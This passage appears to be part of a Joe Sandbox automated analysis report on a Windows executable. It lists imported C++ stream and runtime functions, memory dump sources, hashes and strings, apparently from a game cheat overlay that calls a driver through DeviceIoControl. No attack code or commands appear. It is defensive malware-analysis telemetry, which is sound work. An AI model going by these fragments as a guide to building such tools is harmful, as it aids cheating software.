                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF7866135E0
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7866135F0
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF786613602
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613612
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF786613624
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613634
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF786613646
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613656
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF786613668
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613678
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF78661368A
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF78661369A
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF7866136AC
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7866136BC
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF7866136CE
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7866136DE
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF7866136F0
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613700
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF786613712
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613722
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF786613734
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613744
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF786613756
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613766
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z.MSVCP140 ref: 00007FF786613779
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613789
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z.MSVCP140 ref: 00007FF78661379C
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7866137AC
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF7866137BE
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7866137CE
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF7866137E0
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7866137F0
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF786613802
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613812
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF786613824
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613834
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF786613845
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613855
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF786613867
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613877
                                                                                                                                                                          • Part of subcall function 00007FF786629C80: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF78662952A,?,?,?,00007FF7866299D4), ref: 00007FF786629CE0
                                                                                                                                                                          • Part of subcall function 00007FF786629C80: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF78662952A,?,?,?,00007FF7866299D4), ref: 00007FF786629D02
                                                                                                                                                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7866138A5
                                                                                                                                                                        • ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7866138E3
                                                                                                                                                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7866138ED
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: U?$char_traits@$D@std@@@std@@$V01@$??6?$basic_ostream@$V01@@$V01@_$?setstate@?$basic_ios@Init@?$basic_streambuf@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_ostream@D@std@@@1@_V?$basic_streambuf@fclosememset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 764698701-0
                                                                                                                                                                        • Opcode ID: 07a40512b24c379d44fb5fc842dc0a87102015f34b6abbad548329207398b791
                                                                                                                                                                        • Instruction ID: 4ba898dd78569cd640597092805b13debfda899718767b574f3fcab4107f52f2
                                                                                                                                                                        • Opcode Fuzzy Hash: 07a40512b24c379d44fb5fc842dc0a87102015f34b6abbad548329207398b791
                                                                                                                                                                        • Instruction Fuzzy Hash: 53E1D724F29ACBA3EB40AB51ED54476A763FF85B45FE45032E44E02265DE2CED0DCB21
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.VCRUNTIME140 ref: 00007FF7866139B0
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613A00
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613A12
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613A24
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613A36
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF786613A48
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF786613A5A
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF786613A6C
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613A7E
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF786613A90
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613AA2
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF786613AB4
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613AC6
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613AD8
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613AEA
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613AFC
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B0E
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B20
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B32
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B44
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B56
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B68
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B7A
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B8C
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z.MSVCP140 ref: 00007FF786613B9E
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z.MSVCP140 ref: 00007FF786613BB0
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613BC2
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613BD4
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613BE6
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613BF8
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF786613C0A
                                                                                                                                                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613C1C
                                                                                                                                                                          • Part of subcall function 00007FF786629C80: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF78662952A,?,?,?,00007FF7866299D4), ref: 00007FF786629CE0
                                                                                                                                                                          • Part of subcall function 00007FF786629C80: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF78662952A,?,?,?,00007FF7866299D4), ref: 00007FF786629D02
                                                                                                                                                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF786613C4A
                                                                                                                                                                        • ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF786613C81
                                                                                                                                                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF786613C8B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: D@std@@@std@@U?$char_traits@$??5?$basic_istream@V01@$??1?$basic_ios@??1?$basic_istream@?setstate@?$basic_ios@Init@?$basic_streambuf@fclosememset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1635463032-0
                                                                                                                                                                        • Opcode ID: 27c861ca4dfe52f32d94f1e49729f1f54d1c4d1f8ae6f47ba14cdae85894b0c6
                                                                                                                                                                        • Instruction ID: 28e18dc701cf480f84fef5b33c1333c0a2b2d3dfa1e8091b70dbaf9e6f0ef1d3
                                                                                                                                                                        • Opcode Fuzzy Hash: 27c861ca4dfe52f32d94f1e49729f1f54d1c4d1f8ae6f47ba14cdae85894b0c6
                                                                                                                                                                        • Instruction Fuzzy Hash: E991DF61728A87B3EF40EB54ED949AAA322FF80B45FE05132E54E46578DE2CDD4DCB10
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: free$__acrt_iob_funcfclose
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3697265371-0
                                                                                                                                                                        • Opcode ID: 09583983a69ba5d9f0c5cf5098e8dfe87a0fbfc5c25a7a641f75ebea4985b0ef
                                                                                                                                                                        • Instruction ID: 88ab6a08698aa45b0815823cc59f533510da3623f8cfa8e0743b4cbe6e14761c
                                                                                                                                                                        • Opcode Fuzzy Hash: 09583983a69ba5d9f0c5cf5098e8dfe87a0fbfc5c25a7a641f75ebea4985b0ef
                                                                                                                                                                        • Instruction Fuzzy Hash: 87E1DD35B0ABC1A6EF59AF50EA509B9B3A5FF44B80FA81135CA5D43350DF38B864C720
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                        • Opcode ID: 791f1ca0f5953e676291c10da435f9cfd417d481e82fa6ce9a30f7bede50119b
                                                                                                                                                                        • Instruction ID: ddb67e9b29196001080c2530b11d5a01183c56ce801efcafdf026aaf22c97794
                                                                                                                                                                        • Opcode Fuzzy Hash: 791f1ca0f5953e676291c10da435f9cfd417d481e82fa6ce9a30f7bede50119b
                                                                                                                                                                        • Instruction Fuzzy Hash: 44B12431B0AA82A5FF45AF60DD50ABAA3A1FF45F41FA85535C90D87261DF2CAD04CB70
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: fclose$fseekmalloc$freadfreeftell
                                                                                                                                                                        • String ID: %s, %.0fpx$C:\Windows\Fonts\Impact.ttf
                                                                                                                                                                        • API String ID: 3453272378-2114150515
                                                                                                                                                                        • Opcode ID: 4469056663079f1d276d31713565990429b6030ddcedc6baae0b7696b8c8dc9f
                                                                                                                                                                        • Instruction ID: 6e7cde0beee508d60aa0e8d119fcdae1423fd6f98d3f397895296d460d279634
                                                                                                                                                                        • Opcode Fuzzy Hash: 4469056663079f1d276d31713565990429b6030ddcedc6baae0b7696b8c8dc9f
                                                                                                                                                                        • Instruction Fuzzy Hash: 2591C521A08BC495F7129F69EC012FEB3B0FF98759F546224EE8912B64EF39D546CB10
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: PerformanceQueryexit$CounterCreate9Direct3Frequencymalloc
                                                                                                                                                                        • String ID: @$OTTO$imgui_impl_dx9$imgui_impl_win32
                                                                                                                                                                        • API String ID: 2444153533-2332507762
                                                                                                                                                                        • Opcode ID: f21731b80b1b55b8835324764b18151ae1c52659f3b640e01066e02bb4a5bfed
                                                                                                                                                                        • Instruction ID: a27dc05380ca9ccb03ca96f0fc276b1b764109d4f489b1a8f6b64a57ce24a955
                                                                                                                                                                        • Opcode Fuzzy Hash: f21731b80b1b55b8835324764b18151ae1c52659f3b640e01066e02bb4a5bfed
                                                                                                                                                                        • Instruction Fuzzy Hash: 99D15A71A08BC1AAE311AF29EC043AAB7B5FF44749FA04234DA8807664DF7DE564CF10
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memchr$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                        • String ID: Rifl$Shotgun$Snip
                                                                                                                                                                        • API String ID: 876120417-932107277
                                                                                                                                                                        • Opcode ID: 8ae58c139af3e3eb5fb68fb6d39d56429e735c77dfbc0a0c100c144b57e36bba
                                                                                                                                                                        • Instruction ID: c390c614fce72a02c299564541b856834e87d535f64eaeedf210f11c627beccb
                                                                                                                                                                        • Opcode Fuzzy Hash: 8ae58c139af3e3eb5fb68fb6d39d56429e735c77dfbc0a0c100c144b57e36bba
                                                                                                                                                                        • Instruction Fuzzy Hash: B351C661B186C2A1EA54AB21DC052BBA393BB45760FE84331D66D02BD5DF3CED46CB10
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF78661E8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF7866118E5), ref: 00007FF78661E8F8
                                                                                                                                                                          • Part of subcall function 00007FF78662A090: DeviceIoControl.KERNEL32 ref: 00007FF78662A149
                                                                                                                                                                        • DeviceIoControl.KERNEL32 ref: 00007FF786612963
                                                                                                                                                                          • Part of subcall function 00007FF78661E8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF7866118E5), ref: 00007FF78661E998
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866128B1
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786612ACC
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786612B0D
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786612B5E
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786612B9E
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786612BFA
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786612C77
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786612CC3
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
